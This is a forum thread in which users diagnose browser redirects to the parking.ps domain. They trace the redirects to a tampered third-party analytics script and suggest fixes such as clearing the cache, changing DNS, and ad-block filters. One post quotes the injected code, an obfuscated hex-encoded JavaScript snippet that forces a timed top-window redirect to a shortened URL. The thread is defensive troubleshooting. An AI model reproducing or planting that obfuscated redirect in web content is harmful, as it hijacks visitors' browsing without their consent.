Jump to content
You are not logged in ▶️ Click here to sign-up or login ×

Anyone know about parking.ps/ virus?

davejonesbkk

By davejonesbkk
in IT and Computers

 Share

Recommended Posts

ThaidDown Gold Member

ThaidDown

Posted
Posted

Could also run a superb utility which finds BHO's called HIJACKTHIS you do need a level of tech understanding as its output isn't that easy to read.

To make the output of HijackThis a little easier to understand paste the output log into http://www.hijackthis.de/index.php?langselect=english ,they will analyse it against their database and return results that will give a better understanding.

Link to comment
Share on other sites
  • Replies 88
  • Created
  • Last Reply

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Posted Images

GrantSmith Platinum Member

GrantSmith

Posted
Posted

Seeing as though this was affecting my iOS devices (iPad and iPhone) but not my laptop, I've reverted back to using the app on both iOS devices.

This parking redirect BS is getting worse, prior today the simple work - but still tremendously annoying - around was to click the URL bar which seemed to stop the redirect and left you on the TVF page you were viewing. Now, doing this, stops the redirect on the parking redirect and you then have to hit back to get back to the TVF page.

#firstworldproblemsandallthatjazz

Link to comment
Share on other sites
davejonesbkk Gold Member

davejonesbkk

Posted
  • Author
Posted

that 'always https' plugin for Chrome seems to be doing the job ok for me so far.

For those of you scanning your computer etc with malware programs and looking at the processes you wont find anything as it looks like this is happening in the connection and external to computers

Link to comment
Share on other sites
Maestro Star Member

Maestro

Posted
Posted

At first I thought parking.ps was affecting only PCs and iMacs but now I read that hand-held devices running on Android and iOS also get infected.

For such hand-held device, would the easiest solution be to do a so-called factory reset?

Link to comment
Share on other sites
Para Silver Member

Para

Posted
Posted

@davejonesbkk for it to be s 'connection problem' would IMO mean it was DNS related something that is certainly possibly but difficult to achieve.

@maestro been reading about the massive increase in mobile OS attacks and the shift of focus of hackers to them due to general ignorance of security people have towards them. Samsung are releasing KNOX to try and combat this trend and its just another reason not to root a device....

Link to comment
Share on other sites
SecretAgentMan Rookie Member

SecretAgentMan

Posted
Posted

I'm also experiencing this ***ing parking.ps redirecting problem. In fact, while typing this post it has happened 4 or 5 times. Thai Visa what is going on? It has been happening on other websites too since Thursday but on Thaivisa.com it happens every minute!! It only happens on my iPhone and iPad.

Delete history and cookies. It worked for me.

Link to comment
Share on other sites
chuckygobyebye Senior Member

chuckygobyebye

Posted
Posted

Hi Guys,

This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.

What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure.

The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).

We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.

Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.

The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.

Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked.

  • Like 2
Link to comment
Share on other sites
yankee99 Platinum Member

yankee99

Posted
Posted

Hi Guys,

This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.

What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure.

The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).

We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.

Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.

The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.

Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked.

rubbish.

my galaxy note was redirecting in pattaya, tokyo and miami. My ipad was doing it in all the same locations. My desktop only in pattaya.

Link to comment
Share on other sites
chuckygobyebye Senior Member

chuckygobyebye

Posted
Posted

Hi Guys,

This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.

What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure.

The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).

We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.

Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.

The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.

Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked.

rubbish.

my galaxy note was redirecting in pattaya, tokyo and miami. My ipad was doing it in all the same locations. My desktop only in pattaya.

You're getting cache hits.

Link to comment
Share on other sites
muratremix Gold Member

muratremix

Posted
Posted

The owner of the parking.ps domain explains here what may have happened...

https://discussions.apple.com/message/22912367#22912367

So he is getting free hits but he doesn't like the way his domain searched on google. If he was sincere, atleast he could disable redirects for people from India and Thailand.

I'd say somebody is after quick money and True is too slow to fix things.

Link to comment
Share on other sites
yankee99 Platinum Member

yankee99

Posted
Posted

I think this comes from True's proxy server and is easily removed by Malwarebytes.I've never heard of cleanpcguide.com before and would stay well clear of them, migth easily make matters much worse.

The owner of the parking.ps domain explains here what may have happened...

https://discussions.apple.com/message/22912367#22912367

So he is getting free hits but he doesn't like the way his domain searched on google. If he was sincere, atleast he could disable redirects for people from India and Thailand.

I'd say somebody is after quick money and True is too slow to fix things.

I dont think it has anything to do with true as Narita airport isp does the same thing,,,

Link to comment
Share on other sites
yankee99 Platinum Member

yankee99

Posted
Posted

Hi Guys,

This isn't a virus and it's not a problem that's originating at your machine, it's your internet connection. You can take your device to another connection and the problem will stop.

What's happening is that a file in animated Google ads is being substituted mid-http stream somewhere on the True infrastructure.

The effect is that any page with animated Google ads will be redirected to parking.ps. Pages served via HTTPS won't because the stream is encrypted from end-to-end, that's why HTTPS Everywhere appears to work. However that's not going to work if the page can't be reached via HTTPS (unless they proxy it or something, it's been ages since I looked at HTTPS Everywhere).

We were getting it on our office machines and got rid of it by updating our internet connection config. Specifically, we updated the DNS servers from static to the ones assigned by True (via DHCP) when the cable connection is made. So I recommend checking if you have static DNS servers set up on your router and seeing if you can change them to be assigned via DHCP, or change them to OpenDNS or something. We discovered this when we hooked a machine directly to the cable modem, which was getting its DNS assigned via True's DHCP server.

Note that you'll have to clear your cache after making any changes or the effect is going to continue. The substituted file has the same name as a legitimate one (beacon.jss according to the account on Pantip.com) and I guess they'd also spoofed the etag so that the dodgy one stays in your cache.

The other method to avoid this effect is a little weaker. Because the payload file is being served as part of Google ads, avoiding the ads will avoid the effect. You can install Adblocker, which is what is recommended at the bottom of the parking.ps page itself (ha ha) or you can use Spyware Bot or something similar to block the tracking domain, which is where the file's apparently being served from. I don't recommend either of these methods as it doesn't fix the source of the problem and the problem may reoccur.

Don't go fooling around in your registry or installing dodgy malware scanners. There's nothing wrong with your machine, if you're internet session that's getting hijacked.

rubbish.

my galaxy note was redirecting in pattaya, tokyo and miami. My ipad was doing it in all the same locations. My desktop only in pattaya.

You're getting cache hits.

I will clear my cache on all devices and see what happens.

Link to comment
Share on other sites
easyride Silver Member

easyride

Posted
Posted

I find that this add-on for Firefox works. It gives a small warning by the task bar when it blocks a page.

https://addons.mozilla.org/en-us/firefox/addon/blocksite/

It slows the browser down a bit but I can at least read a newspaper page without being re-directed half a dozen times.

Can't find anything for IE that blocks without putting up another page that says it blocked a page.

Link to comment
Share on other sites
aalek85th Explorer Member

aalek85th

Posted
Posted

There's a javascript file being loaded that is being modified by a 3rd party somehow.

The file name is quant.js. It's loading from: http://edge.quantserve.com/quant.js

The offending code looks like:

//<![CDATA[
if(!fxpr) { var fxpr = 1; function __x(zz) { var _0xede9=["\x77\x69\x6E\x64\x6F\x77\x2E\x74\x6F\x70\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x34\x51\x52\x33\x48\x32\x27\x3B", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72]; setTimeout(_0xede9[0],Math[_0xede9[2]]((Math[_0xede9[1]]()*76543)+zz)); } function vl1() { top.location = 'http://goo.gl/QBwtIl'; } __x(1234); }
//]]>
The hex part is redirecting to http://goo.gl/4QR3H2' which is parking.ps.
If u try to open edge.quantserve.com/quant.js and get this code, hit ctrl+r it will reload and download a original file, clearing cache should also help.
Since it is not happening on all sites, I think it's coming from some broken ad server or quantserve.com dns got poisoned somehow and changed to some malicious IP which had the modified version of quant.js. So it was redirecting when u visit sites that used quant.js from this server.
  • Like 1
Link to comment
Share on other sites
RedCardinal Advanced Member

RedCardinal

Posted
Posted

Thank you, Para. The information in the link you posted looks like the best advice so far in this topic about how to remove the parking.ps redirect. Fortunately, my laptop is not infected but I checked the msconfig just the same to make sure. In Windows 7 it is as follows:

  • Click on Start
  • In the search field, type msconfig, then press Enter
  • Click on Startup in the headings row
  • Click on header Startup Item to sort the list alphabetically
  • Scroll down the list to see if there is Parking.ps in the column Startup Item

Luckily, I haven't got it, nothing starting with P.

attachicon.gifSystem Configuraion Startup.png

There is no parking.ps malware. The malware is actually the fake tools being offered to "remove" it. They will infect your machine with all sorts of junk. The redirect is being caused by JS file that is loading from ISP. This file does not install any malware.

If you're seeing the redirect do not install any tool that offers to remove parking.ps malware.

Link to comment
Share on other sites
  • 4 weeks later...
beb Silver Member

beb

Posted
Posted

woke up this morning to these forex redirects. Going through this and another similar thread, I see a lot of contradictory fixes. has anybody come up with a definitive fix yet? I have adblock, https everywhere etc. installed and have cleared my cache as suggested. I haven't done certain things because others have said they are either ineffective or could be damaging.

Thanks!

Link to comment
Share on other sites
nellyp Silver Member

nellyp

Posted
Posted

My problem started with compare.com hijacking bbc sport. I installed adblocker and that stopped thast page. Then another site strated taking over bbc I cleared cahches and installed HTTPS everywhere. I have no idea what HTTPS everywhere is doing but the counter it has has gone up to 4 in 10 mins. My problem is happening on 2 laptops that I use in 2 different locations, with different providers. Very annoying.

Link to comment
Share on other sites
Scarecrow Rookie Member

Scarecrow

Posted
Posted

Here's what I posted over in the forex thread.

I added these custom filters to Adblock Plus. Other ad blocking extensions might use a different syntax. 

||chartbeat.com^
||quantserve.com^
||scorecardresearch.com^

Those seemed to do the trick for me.

It's possible that Ghostery, a privacy oriented extension, might also work since it blocks some of these same scripts by default. I haven't tried this.

As for HTTPS Everywhere, it simply attempts to make your browser connect to sites via https (encrypted) instead of http (unencrypted). I'm not sure that'll help with this particular problem, but it's worthwhile to have anyway.

Lastly, to reiterate some of what's been said before, these recent redirects are most likely the result of bad third-party scripts on the some of the sites you visit. This is why something as simple as an ad blocker can work; you can tell it to stop those scripts from loading. I hope this has helped.

Link to comment
Share on other sites
beb Silver Member

beb

Posted
Posted

well, it stopped as quickly as it started. I haven't had it happen in 24 hours and can't really say it's because of anything I did. I did add the filters to ad block as suggested just in case.

Thanks

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.




×
×
  • Create New...